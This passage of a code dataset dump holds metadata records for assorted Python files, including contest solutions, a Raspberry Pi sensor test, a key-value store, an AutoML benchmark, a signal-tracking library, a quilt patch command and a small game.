(self.mOffsetBounds != offsetBounds):\n self.mOffsetBounds = offsetBounds\n self.offsetBoundsChanged.emit(self.mOffsetBounds)\n","repo_name":"theall/Python-Tiled","sub_path":"src/tiled/resizehelper.py","file_name":"resizehelper.py","file_ext":"py","file_size_in_byte":6074,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"24014953484","text":"# 二分答案\r\n\r\n# 问题在于:\r\n# 并不是说:对于一个点,向它运动的人超过不向它运动的人\r\n# 而是说:对于一个点,向它运动的人超过向其他点运动的人\r\n\r\n# 计数的时候必须两个坐标一起考虑\r\n\r\nT = int(input())\r\n\r\n\r\ndef solve(Q, dirs):\r\n # print(dirs)\r\n x0, y0 = 0, 0\r\n\r\n def check(x, y):\r\n cnt = 0\r\n for x0, y0, d0 in dirs:\r\n if d0 == 'N' and y > y0:\r\n cnt += 1\r\n if d0 == 'S' and y < y0:\r\n cnt += 1\r\n if d0 == 'W' and x < x0:\r\n cnt += 1\r\n if d0 == 'E' and x > x0:\r\n cnt += 1\r\n return cnt\r\n\r\n prev = check(x0, y0)\r\n\r\n for x, y, dir in sorted(dirs, key=lambda x: x[0]):\r\n cnt = check(x, y0)\r\n if cnt > prev:\r\n prev = cnt\r\n x0 = x\r\n\r\n if x < Q:\r\n cnt = check(x + 1, y0)\r\n if cnt > prev:\r\n prev = cnt\r\n x0 = x + 1\r\n\r\n prev = check(x0, y0)\r\n\r\n for x, y, dir in sorted(dirs, key=lambda x: x[1]):\r\n cnt = check(x0, y)\r\n # print(x0, y0, prev, x, y, cnt)\r\n \r\n if cnt > prev:\r\n prev = cnt\r\n y0 = y\r\n\r\n if y < Q:\r\n cnt = check(x0, y + 1)\r\n if cnt > prev:\r\n prev = cnt\r\n y0 = y + 1\r\n\r\n return str(x0) + \" \" + str(y0)\r\n\r\n\r\nfor t in range(1, T+1):\r\n P, Q = map(int, input().split())\r\n dirs = []\r\n for p in range(P):\r\n x, y, d = input().split()\r\n dirs.append([int(x), int(y), d])\r\n print(\"Case #%d: %s\" % (t, solve(Q, dirs)))\r\n","repo_name":"songzy12/GoogleCodingCompetitions","sub_path":"codejam/2019/Round 1B/Manhattan Crepe Cart.py","file_name":"Manhattan Crepe Cart.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"40901202524","text":"__author__ = 'Veltarn'\r\n\r\nimport RPi.GPIO as GPIO\r\nimport time\r\n\r\nGPIO.setmode(GPIO.BOARD)\r\nport_number = 7\r\nGPIO.setup(port_number, GPIO.IN)\r\n\r\ndef onRising(channel):\r\n '''\r\n Called whenever the hall sensor is triggered\r\n :param channel: Number of the channel\r\n :return:\r\n '''\r\n print(\"Event on \" + str(channel))\r\n\r\ndef onFalling(channel):\r\n '''\r\n Called whenever the hall sensors stop detecting something\r\n :param channel:\r\n :return:\r\n '''\r\n print(\"Nothing to detect\")\r\n\r\ndef main():\r\n\r\n GPIO.add_event_detect(port_number, GPIO.RISING, callback=onRising)\r\n\r\n try:\r\n while True:\r\n time.sleep(0.1)\r\n except KeyboardInterrupt:\r\n GPIO.cleanup()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"Veltarn/Climax","sub_path":"Tests/testhall.py","file_name":"testhall.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70862430728","text":"import datetime\nfrom datetime import datetime\n\nclass Storage(object):\n\n def __init__(self):\n self.__data = {} # { 'default': {\"key1\":[ exp1, value1]}, 'domain2': {\"key1\":[ exp1, value1] }\n\n def set(self, name, value, datatype, expiration=None, domain=\"default\"):\n try:\n if domain not in self.__data:\n self.__data.update({domain: {}})\n self.__data[domain][name] = [value, datatype, expiration]\n return \"0\"\n except Exception as e:\n return str(e)\n\n def get(self, name, domain):\n if domain in self.__data:\n rec = self.__data[domain]\n if name in rec:\n # exp in self.__data[name][0]\n if rec[name][2]: # exp is set\n now = datetime.now().timestamp()\n if now > float(rec[name][2]):\n try:\n del rec.remove[name] # remove from cache\n except Exception as e:\n pass\n return None, None\n return rec[name][0], rec[name][1] #tuple (value, datatype)\n return None, None\n\n def delete(self, name, domain):\n try:\n if domain not in self.__data:\n return \"Domain does not exists\"\n else:\n if name not in self.__data[domain]:\n return \"Key does not exists\"\n del self.__data[domain][name]\n return \"0\"\n except Exception as e:\n return str(e)\n\n\n def reset(self):\n self.__data = {}\n return \"0\"\n\n def stats(self, started, set_hit, get_hit, get_miss):\n r = {'domains': {}, 'started': started, 'set_hit': set_hit, 'get_hit': set_hit, 'get_miss': get_miss}\n for domain in self.__data:\n r[\"domains\"][domain] = {'keys': len(self.__data[domain])}\n return str(r)\n\n # if name in self.__data:\n# # exp in self.__data[name][0]\n# if self.__data[name][0]: # exp is set\n# now = datetime.now().timestamp()\n# if now > float(self.__data[name][0]):\n# try:\n# del self.__data.remove[name] # remove from cache\n# except Exception as e:\n# pass\n# return None\n# return self.__data[name][1]\n# return None\n\n def dump(self):\n return self.__data\n\n","repo_name":"lhotakj/Kasi","sub_path":"kasi/Storage.py","file_name":"Storage.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"}
+{"seq_id":"39931524965","text":"class Solution:\n def containsNearbyDuplicate(self, nums, k):\n store = {}\n for i in range(len(nums)):\n if nums[i] not in store:\n store[nums[i]] = []\n store[nums[i]].append(i)\n for key,v in store.items():\n if len(v) > 1:\n for i in range(1, len(v)):\n if abs(v[i-1]-v[i]) <= k:\n return True\n return False","repo_name":"mihir254/LeetCode","sub_path":"Easy/219-Contains-Duplicate-II.py","file_name":"219-Contains-Duplicate-II.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"13898638298","text":"#剑指offer 类似题\n# 有两个排序的数组 A1 和 A2, 内存在 A1 的末尾有足够多的空余空间容纳 A2.\n# 请实现一个函数,把 A2中的所有数字插入 A1 中,并且所有数字是有序的\narr1 = [3, 4, 7, 9, 10]\narr2 = [1, 2, 4, 5]\n\nres = arr1 + arr2\nprint(res)\np1 = len(arr1) - 1\np2 = len(arr2) - 1\ni = len(res) - 1\nwhile p1 > 0 and p2 > 0 :\n if arr1[p1] == arr2[p2]:\n res[i] = arr1[p1]\n i -= 1\n res[i] = arr2[p2]\n i -= 1\n p1 -= 1\n p2 -= 1\n elif arr1[p1] > arr2[p2]:\n res[i] = arr1[p1]\n i -= 1\n p1 -= 1\n else:\n res[i] = arr2[p2]\n i -= 1\n p2 -= 1\n\nwhile p1 != -1:\n res[i] = arr1[p1]\n p1 -= 1\n i -= 1\nwhile p2 != -1:\n res[i] = arr2[p2]\n p2 -= 1\n i -= 1\n\nprint(res)\n\n \n ","repo_name":"jasmine2018jixun/leetcode2020","sub_path":"leetcode2019/lintcode_212_空格替换.py","file_name":"lintcode_212_空格替换.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"20723265142","text":"import time\nimport json\nimport numpy as np\n\nfrom load_data import load_data\nfrom auto_ml import auto_ml\n\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.ensemble import RandomForestRegressor\n\n# Files\nfiles = []\nfor sim in np.arange(1, 11):\n\n files.append({\"train\": \"../data/Xy/\" + str(sim) + \"_train.csv\",\n \"test\": \"../data/Xy/\" + str(sim) + \"_test.csv\",\n \"task\": \"regression\",\n \"name\": str(sim)})\n\n# Backends\nbackends = [\"sklearn\", \"h2o\", \"tpot\"]\n\n# Settings\nruns = 10 # number of random data sets\ntime_to_run = 60 # run time for each dataset and engine in minutes\nfolds = 5 # number of folds used in cv\n\n# Loop over datasets\n#for run in [8, 9, ]:\nfor run in np.arange(runs):\n\n # Load/Sim data\n X_train, y_train, X_test, y_test = load_data(path_train=files[run][\"train\"], path_test=files[run][\"test\"])\n\n # Random Forest Benchmark\n print(\"Fitting Benchmark via Random Forest\")\n mod_rf = RandomForestRegressor(n_estimators=250)\n mod_rf.fit(X=X_train, y=y_train)\n y_hat_rf = mod_rf.predict(X=X_test)\n mse_benchmark = mean_squared_error(y_true=y_test, y_pred=y_hat_rf)\n\n # Loop over backends\n for engine in backends:\n\n # Verbose\n print(\"Starting \", engine + \" in \" + str(run), \"run\")\n\n # Start time tracking\n start_time = time.time()\n\n try:\n\n # Init model\n mod = auto_ml(backend=engine)\n mod.create_ml(run_time=time_to_run, folds=folds)\n\n # Fitting on training set\n mod.fit(X=X_train, y=y_train)\n\n # Predict on test set\n y_hat = mod.predict(X=X_test)\n\n # End time tracking\n time_elapsed = time.strftime(\"%H:%M:%S\", time.gmtime(time.time() - start_time))\n\n # Eval error on test set\n mse_score = mean_squared_error(y_true=y_test, y_pred=y_hat)\n\n # Results\n info = {\"run\": int(run),\n \"backend\": engine,\n \"mse_test\": mse_score,\n \"mse_benchmark\": mse_benchmark,\n \"time_elapsed\": time_elapsed}\n\n # Write log\n with open(\"../results/\" + time.strftime(\"%Y-%m-%d_%H-%M-%S\", time.gmtime(time.time())) + \"_\" + str(run) + \"_\" + str(engine) + \".json\", \"w\") as outfile:\n json.dump(info, outfile, sort_keys=True, indent=4)\n\n # Verbose\n print(\"Finished \" + engine + \" in \" + str(run) + \" run\")\n\n except (RuntimeError, TypeError, NameError):\n print(\"Error in \" + \"backend \" + engine + \" for \" + str(run), \"run\")\n\n\n\n\n","repo_name":"fabianmax/ML-Automation","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"}
+{"seq_id":"15195403998","text":"# optimizer\noptimizer = dict(type='AdamW', lr=0.00006, weight_decay=0.0001)\n# optimizer = dict(type='Adam', lr=0.001, weight_decay=0.0005)\noptimizer_config = dict()\n# learning policy\n# lr_config = dict(policy='poly', power=1.00, min_lr=1e-5, by_epoch=False)\n# lr_config = dict(\n# policy='CosineAnnealingWarmRestarts',\n# warmup='linear',\n# warmup_iters=2000,\n# warmup_ratio=1.0 / 10,\n# min_lr_ratio=1e-5)\nlr_config = dict(\n policy='CosineRestart',\n restart_weights=[1,1,1,1,1],\n periods=[3750,7500,15000,30000,60000],\n min_lr=1e-6)\n# lr_config = dict(\n# policy='CosineRestart',\n# restart_weights=[1,1,1,1,1],\n# periods=[3000,6000,12000,24000,48000],\n# min_lr=1e-6)\n# runtime settings\nrunner = dict(type='IterBasedRunner', max_iters=120000)\ncheckpoint_config = dict(by_epoch=False, interval=2000, max_keep_ckpts=20)\nevaluation = dict(interval=2000, metric='mIoU')\n","repo_name":"nytbliang/HTMANet","sub_path":"configs/_base_/schedules/schedule_80k.py","file_name":"schedule_80k.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"23436845675","text":"# -*- coding: utf-8 -*-\n\"\"\"Tracks\nEach track has a fs and a duration. There are 4 kinds of tracks:\n\n1 Event - times\n2 Wave - values\n3 TimeValue - values at times, duration\n4 Partition - values between times\n\nAll track intervals are of the type [), and duration points to the next unoccupied sample == length\n\"\"\"\n\nimport logging\nfrom builtins import str\nfrom pathlib import Path\nfrom typing import List, Optional, Union\n\nimport numpy\nfrom signalworks.tracking.metatrack import MetaTrack\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\n# logger.setLevel(logging.WARNING)\n# logger.setLevel(logging.ERROR)\n\nTIME_TYPE = numpy.int64\n\n\ndef convert_dtype(source, target_dtype):\n \"\"\"\n return a link (if unchanged) or copy of signal in the specified dtype (often changes bit-depth as well)\n \"\"\"\n assert isinstance(source, numpy.ndarray)\n source_dtype = source.dtype\n assert source_dtype in (\n numpy.int16,\n numpy.int32,\n numpy.float32,\n numpy.float64,\n ), \"source must be a supported type\"\n assert target_dtype in (\n numpy.int16,\n numpy.int32,\n numpy.float32,\n numpy.float64,\n ), \"target must be a supported type\"\n if source_dtype == target_dtype:\n return source\n else: # conversion\n if source_dtype == numpy.int16:\n if target_dtype == numpy.int32:\n return source.astype(target_dtype) << 16\n else: # target_dtype == numpy.float32 / numpy.float64:\n return source.astype(target_dtype) / (1 << 15)\n elif source_dtype == numpy.int32:\n if target_dtype == numpy.int16:\n return (source >> 16).astype(target_dtype) # lossy\n else: # target_dtype == numpy.float32 / numpy.float64:\n return source.astype(target_dtype) / (1 << 31)\n else: # source_dtype == numpy.float32 / numpy.float64\n M = numpy.max(numpy.abs(source))\n limit = 1 - 1e-16\n if M > limit:\n factor = limit / M\n logger.warning(\n f\"maximum float waveform value {M} is beyond [-{limit}, {limit}],\"\n f\"applying scaling of {factor}\"\n )\n source *= factor\n if target_dtype == numpy.float32 or target_dtype == numpy.float64:\n return source.astype(target_dtype)\n else:\n if target_dtype == numpy.int16:\n return (source * (1 << 15)).astype(target_dtype) # dither?\n else: # target_dtype == numpy.int32\n return (source * (1 << 31)).astype(target_dtype) # dither?\n\n\nclass Track(MetaTrack):\n default_suffix = \".trk\"\n\n def __init__(self, path):\n self._fs = 0\n self.type: Optional[str] = None\n self.min: Union[int, float, None] = None\n self.max: Union[int, float, None] = None\n self.unit: Optional[str] = None\n self.label: Optional[str] = None\n if path is None:\n path = str(id(self))\n self.path = Path(path).with_suffix(self.default_suffix)\n\n def get_time(self):\n raise NotImplementedError\n\n def set_time(self, time):\n raise NotImplementedError\n\n time = property(get_time, set_time)\n\n def get_value(self):\n raise NotImplementedError\n\n def set_value(self, value):\n raise NotImplementedError\n\n value = property(get_value, set_value)\n\n def get_fs(self):\n return self._fs\n\n def set_fs(self, _value):\n raise Exception(\"Cannot change fs, try resample()\")\n\n fs = property(get_fs, set_fs, doc=\"sampling frequency\")\n\n def get_duration(self):\n pass\n\n def set_duration(self, duration):\n raise NotImplementedError\n\n duration = property(get_duration, set_duration)\n\n def __eq__(self, other):\n raise NotImplementedError\n\n def __ne__(self, other):\n raise NotImplementedError\n\n def __len__(self):\n pass\n\n def __str__(self):\n pass\n\n def 
__add__(self, other):\n raise NotImplementedError\n\n @classmethod\n def read(cls, path, samplerate=None):\n # we do the imports here to avoid circular import when Wave inherits Track, and Track call Wave's function\n # we only need a function from the dependencies\n from signalworks.tracking.partition import Partition\n from signalworks.tracking.timevalue import TimeValue\n from signalworks.tracking.wave import Wave\n from signalworks.tracking.multitrack import MultiTrack\n\n \"\"\"Loads object from name, adding default extension if missing.\"\"\"\n # E = []\n suffix = Path(path).suffix\n\n with open(path, \"rb\") as fileIn:\n bufHeader = fileIn.read(38)\n if (\n (bufHeader[0:4] == b\"RIFF\")\n and (bufHeader[12:16] == b\"fmt \")\n and (bufHeader[0:5] != b\"RIFFB\")\n ):\n channels = None\n mmap = False\n return Wave.wav_read(path, channels, mmap)\n elif suffix == \".tmv\":\n return TimeValue.read_tmv(path) # for now, handle nans\n elif suffix == \".lab\":\n return Partition.read(path)\n elif suffix == \".edf\":\n return MultiTrack.read_edf(path)\n elif suffix == \".xdf\":\n return MultiTrack.read_xdf(path)\n else:\n channels = None\n mmap = False\n return Wave.wav_read(path, channels, mmap)\n\n def write(self, name, *args, **kwargs):\n \"\"\"Saves object to name, adding default extension if missing.\"\"\"\n raise NotImplementedError\n\n def resample(self, fs):\n \"\"\"resample self to a certain fs\"\"\"\n raise NotImplementedError\n\n def select(self, a, b):\n \"\"\"\n return a selection of the track from a to b. a and b are in fs units.\n Times are new objects, but values are views - idea is to make a read-only section, not a copy\n \"\"\"\n raise NotImplementedError\n\n def insert(self, a, t):\n raise NotImplementedError\n\n def remove(self, a, b):\n raise NotImplementedError\n\n def copy(self, a, b):\n raise NotImplementedError\n\n def cut(self, a, b):\n t = self.copy(a, b)\n self.remove(a, b)\n return t\n\n\ndef get_track_classes() -> List[Track]:\n def all_subclasses(c):\n return c.__subclasses__() + [\n a for b in c.__subclasses__() for a in all_subclasses(b)\n ]\n\n return [obj for obj in all_subclasses(Track)]\n\n\n# TODO: class NamedEvent(_Track)\n# there hasn't been a need for it yet, but may be useful in the future\n# wonder if I can extend Event itself with optional values...\n# class NamedEvent(_Track):\n# def __init__(self, time, value, fs, duration)\n\n\n# class HetMultiTrack(MultiTrack): # may want to define common abstract class instead\n# \"\"\"\n# A dictionary containing time-synchronous tracks of equal duration, but HETEROGENOUS fs\n# \"\"\"\n\n# # this fs relates to the manner by which we time-index (possibly with float) into the multitrack object.\n# # Use 1.0 for seconds.\n# def __init__(self, mapping=dict(), fs=1.0):\n# dict.__init__(self, mapping)\n# if __debug__: # long assert - TODO: do this on mapping, and then assign\n# self.check()\n# self._fs = fs\n\n# def check(self):\n# if len(self) > 1:\n# duration = None\n# for i, (key, track) in enumerate(self.items()):\n# if duration is None:\n# duration = track.duration / track.fs\n# if track.duration / track.fs != duration:\n# raise AssertionError(\n# f\"all durations must be equal, track #{i} ('{key}') does not match track #1\"\n# )\n\n# def get_fs(self):\n# if len(self):\n# return self._fs\n# else:\n# return 0 # or raise?\n\n# def set_fs(self, fs):\n# self._fs = fs\n\n# fs = property(get_fs, set_fs, doc=\"sampling frequency of time-index\")\n\n# def select(self, a, b, keys=None):\n# assert a >= 0\n# assert a < b # 
or a <= b?\n# assert b <= self.duration\n# \"\"\"return a new object with all track views from time a to b\"\"\"\n# if keys is None:\n# keys = self.keys()\n# obj = type(self)()\n# for key in keys:\n# trk = self[key]\n# obj[key] = trk.select(\n# a / self._fs * trk._fs, b / self._fs * trk._fs\n# ) # untested\n# return obj\n\n# def test_pml(self):\n# import tempfile\n# tmp = tempfile.NamedTemporaryFile(prefix='test_pml_')\n# filename = tmp.name\n# tmp.close()\n# self.t.pmlwrite(filename)\n# s = Event.pmlread(filename)\n# os.unlink(filename)\n# # duration CANNOT be encoded in the file (or can it?)\n# s.duration = int(numpy.round(self.t.duration * s.fs / self.t.fs))\n# s = s.resample(self.t.fs)\n# self.assertTrue(numpy.allclose(s.time, self.t.time))\n","repo_name":"TimeViewers/signalworks","sub_path":"signalworks/tracking/tracking.py","file_name":"tracking.py","file_ext":"py","file_size_in_byte":9039,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"}
+{"seq_id":"26559230805","text":"# -*- coding: utf-8 -*-\n\n\n# Задача: вычислить 3 тикера с максимальной и 3 тикера с минимальной волатильностью в МНОГОПРОЦЕССНОМ стиле\n#\n# Бумаги с нулевой волатильностью вывести отдельно.\n# Результаты вывести на консоль в виде:\n# Максимальная волатильность:\n# ТИКЕР1 - ХХХ.ХХ %\n# ТИКЕР2 - ХХХ.ХХ %\n# ТИКЕР3 - ХХХ.ХХ %\n# Минимальная волатильность:\n# ТИКЕР4 - ХХХ.ХХ %\n# ТИКЕР5 - ХХХ.ХХ %\n# ТИКЕР6 - ХХХ.ХХ %\n# Нулевая волатильность:\n# ТИКЕР7, ТИКЕР8, ТИКЕР9, ТИКЕР10, ТИКЕР11, ТИКЕР12\n# Волатильности указывать в порядке убывания. Тикеры с нулевой волатильностью упорядочить по имени.\n#\nimport multiprocessing\n\nfrom path_sort_data import get_path, sort, output_data\n\n\nclass SecuritiesVolatility(multiprocessing.Process):\n\n def __init__(self, file_name, collector, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.file_name = file_name\n self.collector = collector\n self.securities = {}\n\n def volatility_calculation(self):\n with open(self.file_name, 'r', encoding='utf8') as file:\n prices = []\n for line in file:\n if line != 'SECID,TRADETIME,PRICE,QUANTITY\\n':\n elems = line.split(',')\n price = float(elems[2])\n security_paper = elems[0]\n prices.append(price)\n min_price = min(prices)\n max_price = max(prices)\n average_price = (max_price + min_price) / 2\n volatility = round(((max_price - min_price) / average_price) * 100, 2)\n self.securities[security_paper] = volatility\n self.collector.put(self.securities)\n\n def run(self):\n self.volatility_calculation()\n\n\nif __name__ == '__main__':\n\n securities_volatility = {}\n\n wanted_folder = 'trades'\n path = get_path(wanted_folder)\n\n collector = multiprocessing.Queue()\n data_securities = [SecuritiesVolatility(file_name=file, collector=collector) for file in path]\n\n for process in data_securities:\n process.start()\n\n for process in data_securities:\n process.join()\n\n while not collector.empty():\n data = collector.get()\n securities_volatility.update(data)\n\n data = sort(securities_volatility)\n securities_volatility = data[0]\n zero_volatility = data[1]\n output_data(securities_volatility, zero_volatility)\n# зачет!\n","repo_name":"tidml/python_base","sub_path":"lesson_012/03_volatility_with_processes.py","file_name":"03_volatility_with_processes.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"18151778464","text":"#Problem 2\r\n#Kullanıcıdan 3 tane sayı alın ve en büyük sayıyı ekrana yazdırın.\r\n\r\ns1=int(input(\"1.Sayı: \"))\r\ns2=int(input(\"2.Sayı: \"))\r\ns3=int(input(\"3.Sayı: \"))\r\n\r\nif(s1>s2 and s1>s3):\r\n print(\"Sayu 1 En Büyük.\")\r\nelif(s2>s3 and s2>s1):\r\n print(\"Sayı 2 En Büyük.\")\r\nelif(s3>s2 and s3>s1):\r\n print(\"Sayu 3 En büyük.\") ","repo_name":"4Noyis/Python","sub_path":"Python/Part_2/Problem_2.py","file_name":"Problem_2.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"71302620167","text":"from quilt.command import Command\nfrom quilt.db import Db, Series\nfrom quilt.error import NoPatchesInSeries, NoAppliedPatch, UnknownPatch, \\\n QuiltError\nfrom quilt.patch import Patch\nfrom quilt.pop import Pop\nfrom quilt.signals import Signal\nfrom quilt.utils import Directory, File\n\n\nclass Delete(Command):\n\n \"\"\"Command class to delete patches\n \"\"\"\n\n deleting_patch = Signal()\n deleted_patch = Signal()\n\n def __init__(self, cwd, quilt_pc, quilt_patches):\n super(Delete, self).__init__(cwd)\n self.quilt_pc = Directory(quilt_pc)\n self.quilt_patches = Directory(quilt_patches)\n self.db = Db(quilt_pc)\n self.series = Series(quilt_patches)\n self.pop = Pop(cwd, quilt_pc)\n\n def _delete_patch(self, patch, remove=False, backup=False):\n if self.series.is_empty():\n raise NoPatchesInSeries(self.series)\n if not self.series.is_patch(patch):\n raise UnknownPatch(self.series, patch)\n\n applied = self.db.top_patch() == patch\n self.deleting_patch(patch, applied)\n\n if applied:\n self.pop._unapply_patch(patch)\n self.db = self.pop.db\n self.db.save()\n\n self.series.remove_patch(patch)\n self.series.save()\n\n patch_file = self.quilt_patches + File(patch.get_name())\n\n if remove:\n if backup:\n patch_file.copy(File(patch_file.get_name() + \"~\"))\n\n patch_file.delete_if_exists()\n\n self.deleted_patch(patch)\n\n def delete_next(self, remove=False, backup=False):\n \"\"\" Delete next unapplied patch\n If remove is True the patch file will also be removed. If remove and\n backup are True a copy of the deleted patch file will be made.\n \"\"\"\n patch = self.db.top_patch()\n if patch:\n after = self.series.patch_after(patch)\n else:\n after = self.series.first_patch()\n if not after:\n raise QuiltError(\"No next patch\")\n\n self._delete_patch(after, remove=remove, backup=backup)\n\n def delete_patch(self, patch_name=None, remove=False, backup=False):\n \"\"\" Delete specified patch from the series\n If remove is True the patch file will also be removed. If remove and\n backup are True a copy of the deleted patch file will be made.\n \"\"\"\n if patch_name:\n patch = Patch(patch_name)\n else:\n patch = self.db.top_patch()\n if not patch:\n raise NoAppliedPatch(self.db)\n\n self._delete_patch(patch, remove=remove, backup=backup)\n","repo_name":"bjoernricks/python-quilt","sub_path":"quilt/delete.py","file_name":"delete.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"}
+{"seq_id":"25174028942","text":"import csv\nimport sys\nimport pydot\nimport numpy as np\nfrom sklearn import tree\nfrom sklearn import preprocessing\nfrom sklearn.externals.six import StringIO\nclass_names=['low','medium','high']\n#Args checking\nif(len(sys.argv) is not 3):\n\tprint(\"Usage: python3 E13.py \")\n\texit()\n#Files open\ntraining=list(csv.reader(open(sys.argv[1])))\nfeature_names=training[0][1:-1]\ntraining=training[1:]\n#Training data separation\ntarget=list(map(lambda x : x[-1],training))\nle = preprocessing.LabelEncoder()\nle.fit(class_names)\n\nclass_names=le.inverse_transform(np.sort(le.transform(class_names)))\n\ntarget=le.transform(target)\n\ndata=np.array(list(map(lambda x : x[1:-1],training)))\n\n#Decision Tree Training\ntreeClas=tree.DecisionTreeClassifier()\ntreeClas.fit(data, target)\n\n#Decision Tree Plot\ndot_data = StringIO()\n\ntree.export_graphviz(treeClas, out_file=dot_data,feature_names=feature_names,class_names=class_names,filled=True, rounded=True, special_characters=True)\n\ngraph = pydot.graph_from_dot_data(dot_data.getvalue())\ngraph.write_pdf(path=sys.argv[2])\n","repo_name":"Xiul109/MachineLearningTec","sub_path":"E13.py","file_name":"E13.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"16168737272","text":"'''SNAKE WATER GUN GAME'''\r\n'''IN THIS STEP WE ARE IMPORTING AN INBUILT MODULE RANDOM WHICH WILL HELP US IN RANDOMIZING THE COMPUTERS OUTPUT'''\r\nimport random\r\n'''THIS IS A MODULE FOR MAKING GUI'''\r\nimport easygui\r\ndef game(user,comp):#HERE WE ARE DEFINING A FUNCTION THAT WILL HELP US IN COMPARING THE OUTPUT OF THE USER AND THE COMPUTER AND DECIDE THE WINNER\r\n if user==comp:\r\n return None\r\n elif comp=='s':\r\n if user=='w':\r\n return False\r\n elif user=='g':\r\n return True \r\n elif comp=='w':\r\n if user=='s':\r\n return True\r\n elif user=='g':\r\n return False\r\n elif comp=='g':\r\n if user=='s':\r\n return False\r\n elif user=='w':\r\n return True #THIS PART IS THE LOGICAL PART\r\n'''NOW WE NEED TO THINK ABOUT THE COMPUTER OUTPUT '''\r\ncomp=(\"Computer's turn : Snake(s) Water(w) Gun(g)\")\r\nrandno=random.randint(1,3) #SO AFTER CALLING THE RANDOM FUNCTION WE ARE GRNERATING RANDOM NUMBERS BETWEEEN 1 AND 3 \r\nif randno==1:\r\n comp='s'\r\nelif randno==2:\r\n comp='w'\r\nelse:\r\n comp='g' #ASSIGNED THOSE VALUES TO THE COMPUTERS OUTPUT\r\n# '''TAKING INPUT FROM THE USER''' \r\nprint(\"WELCOME TO THE GAME OF SNAKE WATER AND GUN SNAKE YOU ARE AGAINST COMPUTER \\n MAY THE BETTER PLAYER WIN \") \r\nuser=input(\"User's turn: Snake(s) Water(w) Gun(g): \")\r\nprint(f\"Computer chose {comp}\")\r\nprint(f\"user chose {user}\")\r\nf=game(user,comp)\r\nif f==None:\r\n easygui.ynbox('ITS A DRAW !')\r\nelif f:\r\n easygui.ynbox('YOU WIN COMPUTER NOOBDA')\r\nelse:\r\n easygui.ynbox('YOU LOOSE KOI NA')\r\n\r\n","repo_name":"mayankfulara/Snake-Water-Gun-Game","sub_path":"SnakeWate.py","file_name":"SnakeWate.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"42327018291","text":"\"\"\" Common get functions for segment-routing \"\"\"\r\n\r\n# Python\r\nimport re\r\nimport logging\r\n\r\n# pyATS\r\nfrom pyats.utils.objects import find, R\r\n\r\n# Genie\r\nfrom genie.libs.sdk.libs.utils.normalize import GroupKeys\r\nfrom genie.metaparser.util.exceptions import SchemaEmptyParserError\r\n\r\n# Running-Config\r\nfrom genie.libs.sdk.apis.iosxe.running_config.get import (\r\n get_running_config_section_dict,\r\n)\r\n\r\nlog = logging.getLogger(__name__)\r\n\r\n\r\ndef get_segment_routing_policy_active_path_hop_labels(device, policy,\r\n policy_dict=None, ignore_first_label=False):\r\n \"\"\" Find a segement-routing policy in expected state\r\n\r\n Args:\r\n device ('obj'): Device object\r\n policy ('str'): Policy name\r\n policy_dict ('dict'): Policy dict from parser output\r\n IOSXE Parser - ShowSegmentRoutingTrafficEngPolicy\r\n cmd - show segment-routing traffic-eng policy all\r\n ignore_first_label (`bool`): flag to ignore first label\r\n Returns:\r\n labels ('list'): Hop labels\r\n \"\"\"\r\n labels = []\r\n cmd = 'show segment-routing traffic-eng policy name {policy}'.format(policy=policy)\r\n if policy_dict is None:\r\n try:\r\n out = device.parse(cmd)\r\n except Exception as e:\r\n log.error(\"Failed to parse '{cmd}': {e}\".format(cmd=cmd, e=e))\r\n return labels\r\n else:\r\n out = policy_dict\r\n\r\n # Check explicit path\r\n reqs = R(['(.*{}.*)'.format(policy),'candidate_paths',\r\n 'preference','(?P.*)',\r\n 'path_type','explicit',\r\n '(?P.*)','(?P.*)',\r\n 'status','(?P.*)'])\r\n explicit = find([out], reqs, filter_=False, all_keys=True)\r\n if explicit:\r\n keys = GroupKeys.group_keys(reqs=reqs.args, ret_num={},\r\n source=explicit, all_keys=True)\r\n \r\n for item in keys:\r\n if item['status'] == 'active':\r\n path_index = item['preference']\r\n\r\n reqs2 = R(['(.*{}.*)'.format(policy),'candidate_paths',\r\n 'preference',path_index,\r\n 'path_type','explicit',\r\n '(?P.*)','(?P.*)',\r\n 'hops','(?P.*)'])\r\n hops = find([out], reqs2, filter_=False, all_keys=True)\r\n if hops:\r\n hop = hops[0][0]\r\n for value in hop.values():\r\n sid = value.get('sid', '')\r\n labels.append(str(sid))\r\n\r\n if ignore_first_label and len(labels):\r\n labels.pop(0)\r\n return labels\r\n\r\n # Check dynamic path if no active path in explicit path\r\n reqs = 